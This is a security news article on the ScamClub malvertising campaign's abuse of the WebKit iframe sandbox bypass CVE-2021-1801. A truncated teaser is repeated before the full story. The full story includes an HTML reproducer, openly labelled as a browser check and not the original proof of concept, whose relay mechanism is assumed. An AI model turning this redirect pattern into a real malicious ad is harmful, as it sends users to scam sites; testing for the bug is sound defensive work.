Malvertising Group Harnesses WebKit 0-Day to Redirect Users to Scam Sites

February 17, 2021

A malvertising collective known as “ScamClub” has exploited a zero-day vulnerability in WebKit-based browsers to inject malicious payloads that redirect users to fraudulent gift card scam websites. The attacks, first identified by the advertising security firm Confiant in late June 2020, took advantage of a bug (CVE-2021-1801) that allowed the attackers to circumvent the iframe sandboxing policy in WebKit, the browser engine used by Safari and by every browser on iOS, Google Chrome included, and so to force a redirect that the sandbox should have blocked. The technique specifically targeted the way WebKit handled JavaScript event listeners, allowing attackers to escape the sandbox of an ad’s inline frame even with the “allow-top-navigation-by-user-activation” attribute in place, which is supposed to permit navigation of the top-level page only when it is triggered by a user gesture inside the iframe itself. To validate this, researchers created a simple HTML file featuring a cross-origin sandboxed iframe, along with an external button…

Malvertisers Exploit WebKit 0-Day to Redirect Users to Fraudulent Schemes

On February 17, 2021, security researchers revealed a significant cybersecurity threat posed by a malvertising group dubbed “ScamClub.” This group has taken advantage of a zero-day vulnerability within WebKit-based browsers, enabling them to inject malicious payloads that redirect unsuspecting users to scam websites, particularly involving fraudulent gift card schemes.

The vulnerability, tracked as CVE-2021-1801, was exploited in attacks that Confiant first observed in late June 2020. The bug lies in WebKit, the engine behind Safari and, by Apple's platform rules, every browser on iOS, including Google Chrome for iOS, so users of all of those browsers were exposed. It allowed attackers to circumvent the iframe sandboxing policy and force a top-level navigation that the sandbox should have refused. By exploiting a weakness in how WebKit handled JavaScript event listeners, the attackers were able to escape the confinement typically enforced on ad inline frames. This worked despite the “allow-top-navigation-by-user-activation” sandbox flag, which is designed to let a sandboxed frame navigate the top-level page only when the navigation is triggered by a user gesture inside that frame, never by a click elsewhere on the page. Apple fixed the bug in Safari 14.0.3 and iOS 14.4, so browsers at or above those versions are no longer affected.

To confirm the bypass, researchers constructed a minimal HTML file containing a cross-origin sandboxed iframe and a button placed outside the iframe. A click on that outside button gives the frame no user activation of its own, and so no right to navigate the top-level page, yet an event listener wired between the parent's click and the frame's script was enough for WebKit to let the frame redirect the whole page. The demonstration shows how a click that never touches the ad frame can be laundered into permission to leave the page, which is exactly what a malicious ad needs.
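The harness below is an added example written for this page, not Confiant's proof of concept, and it reproduces only the shape the text describes: a cross-origin sandboxed iframe, a button outside it, and an event listener that carries the outside click into the frame. The relay is assumed here to be a postMessage() from the parent's click handler to the frame; the destination https://example.com/ and the element ids are placeholders. Save it as a single .html file and open it in the browser you want to check. A browser that enforces the sandbox correctly leaves the page only for the click inside the frame and logs "blocked" for the click outside it; a WebKit build vulnerable to CVE-2021-1801 leaves the page in both cases.

```html
<!doctype html>
<meta charset="utf-8">
<title>Sandboxed-iframe top-navigation check (CVE-2021-1801 reproducer shape, added example)</title>
<p>1. Click the button <em>inside</em> the frame: the page should leave (navigation backed by a real user gesture in the frame).</p>
<p>2. Reload, then click the button <em>outside</em> the frame: a correct browser stays here and logs "blocked";
   a WebKit build vulnerable to CVE-2021-1801 leaves the page.</p>
<button id="outside">Click outside the frame</button>
<pre id="log"></pre>
<!-- No allow-same-origin, so the srcdoc frame gets an opaque origin and is cross-origin to this page,
     the same shape as a third-party ad slot. -->
<iframe id="ad" width="320" height="120"
        sandbox="allow-scripts allow-top-navigation-by-user-activation"></iframe>
<script>
  const frame = document.getElementById('ad');
  const logEl = document.getElementById('log');
  const log = (msg) => { logEl.textContent += msg + '\n'; };

  // DESTINATION is a harmless placeholder for the redirect target, not a real scam domain (assumption).
  const DESTINATION = 'https://example.com/';

  // The frame's document. It tries to navigate the top-level page in two ways:
  //   - from a click on its own button (activation inside the frame: must succeed), and
  //   - from a message event relayed by the parent's click handler (no activation of its own: must fail).
  frame.srcdoc = `
    <button id="inner">Click inside the frame</button>
    <script>
      function tryTopNavigation(trigger) {
        try {
          top.location.href = ${JSON.stringify(DESTINATION)} + '?via=' + trigger;
          // Still here after a moment? The browser refused the navigation (some engines only log, never throw).
          setTimeout(() => parent.postMessage({ trigger, result: 'blocked' }, '*'), 500);
        } catch (err) {
          parent.postMessage({ trigger, result: 'blocked (' + err.name + ')' }, '*');
        }
      }
      document.getElementById('inner').addEventListener('click', () => tryTopNavigation('inside-click'));
      addEventListener('message', (e) => { if (e.data === 'go') tryTopNavigation('outside-click'); });
    <\/script>`;

  // The parent's click handler relays the click into the frame. Only this window holds the
  // transient user activation; the sandbox must not let the frame borrow it.
  document.getElementById('outside').addEventListener('click', () => {
    log('parent: click outside the frame, relaying via postMessage');
    frame.contentWindow.postMessage('go', '*'); // '*' because the frame's origin is opaque
  });

  // Results reported back by the frame; only accept messages from our own frame.
  addEventListener('message', (e) => {
    if (e.source !== frame.contentWindow) return;
    log(`frame: ${e.data.trigger} -> ${e.data.result}`);
  });
</script>
```

If the page navigates away on the outside click, the browser let a sandboxed frame spend activation it never received, which is the bug class this campaign relied on. The "blocked" log line is the expected result on a patched engine; the inside click is the control that proves the flag itself is honoured.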

The targets of these fraudulent schemes are users of WebKit-based browsers, which have a large user base in the United States. Because the bypass needs no interaction with the ad itself, a single click anywhere on a page carrying the ad is enough, which is why user awareness alone is a weak defense here and why publishers and ad networks have to treat iframe sandbox enforcement as a browser-level guarantee to be verified rather than assumed. As more users interact with digital advertisements, the exposure to this kind of redirect grows.

In MITRE ATT&CK terms, the campaign maps to Drive-by Compromise (T1189), which explicitly covers malvertising: the attackers placed malicious content into legitimate advertising networks and relied on a browser vulnerability to act when a page carrying the ad was viewed. The payload is a redirect to a scam site that depends on social engineering, not an implant on the device, so persistence and privilege escalation play no part in this attack; the initial-access technique is the entire chain, and patching the browser closes it.

For businesses that publish or buy advertising, the implications are considerable. As digital advertising becomes a dominant means of outreach, understanding the weaknesses in the web technologies that ad slots depend on is essential for safeguarding both users and brand reputation. Organizations must continually reassess their controls, including the sandbox attributes they apply to ad frames and the browser versions their audience runs, as new vulnerabilities and attack strategies emerge.

The ScamClub campaign is a reminder that a security attribute is only as strong as the engine enforcing it. As attackers continue to probe widely used technologies, collaboration between publishers, ad-security firms, and browser developers remains the most effective way to shorten the window between a bypass being abused in the wild and a fix reaching users.
